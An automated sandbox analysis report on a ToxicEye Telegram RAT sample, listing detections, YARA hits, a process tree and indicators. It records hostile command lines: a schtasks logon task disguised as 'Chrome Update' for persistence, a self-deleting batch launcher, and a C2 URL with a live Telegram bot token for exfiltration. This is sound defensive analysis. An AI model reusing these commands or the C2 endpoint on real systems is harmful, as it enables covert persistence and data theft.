Edit tour

Windows Analysis Report
dAIJ6g47mZ.exe

Overview

General Information

Sample name:	dAIJ6g47mZ.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:	638f25147bfea8cdd2c8e010682388d64868d77e236995972059e7fcbcc6a517
Analysis ID:	1379470
MD5:	b4354ee75e6d043ad4ba2c6d2df30a6e
SHA1:	ae7972c9427173e0aad8e4252d1b071d5978ba41
SHA256:	638f25147bfea8cdd2c8e010682388d64868d77e236995972059e7fcbcc6a517
Infos:

Detection

Clipboard Hijacker, ToxicEye

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Clipboard Hijacker

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected ToxicEye

C2 URLs / IPs found in malware configuration

Contains functionality to disable the Task Manager (.Net Source)

Contains functionality to log keystrokes (.Net Source)

Drops PE files to the user root directory

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

dAIJ6g47mZ.exe (PID: 2960 cmdline: C:\Users\user\Desktop\dAIJ6g47mZ.exe MD5: B4354EE75E6D043AD4BA2C6D2DF30A6E)

conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3248 cmdline: C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6428 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7068 cmdline: Tasklist /fi "PID eq 2960" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6280 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

timeout.exe (PID: 5868 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)

rat.exe (PID: 5928 cmdline: "rat.exe" MD5: B4354EE75E6D043AD4BA2C6D2DF30A6E)

conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2544 cmdline: C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 3476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 5044 cmdline: C:\Windows\system32\WerFault.exe -u -p 5928 -s 2976 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

rat.exe (PID: 992 cmdline: C:\Users\ToxicEye\rat.exe MD5: B4354EE75E6D043AD4BA2C6D2DF30A6E)

conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
ToxicEye	ToxicEye is a ransomware that spreads through phishing emails. The malware encrypts system files with AES-256 and demands a ransom in Bitcoin.	No Attribution	https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/ https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/	https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage"}

Threatname: ToxicEye

{"C2 url": "https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author
dAIJ6g47mZ.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
dAIJ6g47mZ.exe	JoeSecurity_ToxicEye	Yara detected ToxicEye	Joe Security
dAIJ6g47mZ.exe	JoeSecurity_Clipboard_Hijacker_3	Yara detected Clipboard Hijacker	Joe Security
dAIJ6g47mZ.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
dAIJ6g47mZ.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\ToxicEye\rat.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\ToxicEye\rat.exe	JoeSecurity_ToxicEye	Yara detected ToxicEye	Joe Security
C:\Users\ToxicEye\rat.exe	JoeSecurity_Clipboard_Hijacker_3	Yara detected Clipboard Hijacker	Joe Security
C:\Users\ToxicEye\rat.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\ToxicEye\rat.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ToxicEye	Yara detected ToxicEye	Joe Security
00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Clipboard_Hijacker_3	Yara detected Clipboard Hijacker	Joe Security
00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: dAIJ6g47mZ.exe PID: 2960	JoeSecurity_ToxicEye	Yara detected ToxicEye	Joe Security
Process Memory Space: dAIJ6g47mZ.exe PID: 2960	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dAIJ6g47mZ.exe PID: 2960	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack	JoeSecurity_ToxicEye	Yara detected ToxicEye	Joe Security
0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack	JoeSecurity_Clipboard_Hijacker_3	Yara detected Clipboard Hijacker	Joe Security
0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 2960

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dAIJ6g47mZ.exe	ReversingLabs: Detection: 95%
Source: dAIJ6g47mZ.exe	Virustotal: Detection: 77%

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe

File read: C:\Users\user\Desktop\dAIJ6g47mZ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\dAIJ6g47mZ.exe C:\Users\user\Desktop\dAIJ6g47mZ.exe
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 2960"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\ToxicEye\rat.exe "rat.exe"
Source: C:\Users\ToxicEye\rat.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\ToxicEye\rat.exe C:\Users\ToxicEye\rat.exe
Source: C:\Users\ToxicEye\rat.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\ToxicEye\rat.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\ToxicEye\rat.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5928 -s 2976
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 2960"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\ToxicEye\rat.exe "rat.exe"	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe	Jump to behavior

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 2960"

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\ToxicEye\rat.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: dAIJ6g47mZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: dAIJ6g47mZ.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: dAIJ6g47mZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Xml.ni.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: TelegramRAT.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.ni.pdbRSDS source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: rat.exe, 0000000A.00000002.2170409712.0000023F1DD34000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Configuration.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\System.pdb source: rat.exe, 0000000A.00000002.2171890625.0000023F36965000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Core.pdbH source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Xml.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.pdb source: rat.exe, 0000000A.00000002.2170409712.0000023F1DD34000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2171890625.0000023F3697B000.00000004.00000020.00020000.00000000.sdmp, WER284.tmp.dmp.18.dr
Source:	Binary string: C:\Users\Gerrard\Downloads\ToxicEye-master\ToxicEye-master\TelegramRAT\TelegramRAT\obj\Release\TelegramRAT.pdb+ source: dAIJ6g47mZ.exe, rat.exe.0.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: mscorlib.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.pdbH source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Management.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Drawing.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: rat.exe, 0000000A.00000002.2171890625.0000023F36940000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Management.ni.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: C:\Users\Gerrard\Downloads\ToxicEye-master\ToxicEye-master\TelegramRAT\TelegramRAT\obj\Release\TelegramRAT.pdb source: dAIJ6g47mZ.exe, rat.exe.0.dr
Source:	Binary string: System.Core.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Windows.Forms.pdbIL_STUB_PInvoke source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Xml.pdbE source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.ni.pdb source: WER284.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER284.tmp.dmp.18.dr

Source: dAIJ6g47mZ.exe

Static PE information: 0xCB7FC332 [Thu Mar 10 14:24:50 2078 UTC]

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Code function: 0_2_00007FFD348A322D push eax; retf	0_2_00007FFD348A3419
Source: C:\Users\ToxicEye\rat.exe	Code function: 10_2_00007FFD348889E8 push E85CC07Ch; ret	10_2_00007FFD348889F9
Source: C:\Users\ToxicEye\rat.exe	Code function: 10_2_00007FFD34883403 push eax; retf	10_2_00007FFD34883419

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe

File created: C:\Users\ToxicEye\rat.exe

Jump to dropped file

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe

File created: C:\Users\ToxicEye\rat.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe

File created: C:\Users\ToxicEye\rat.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe

Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
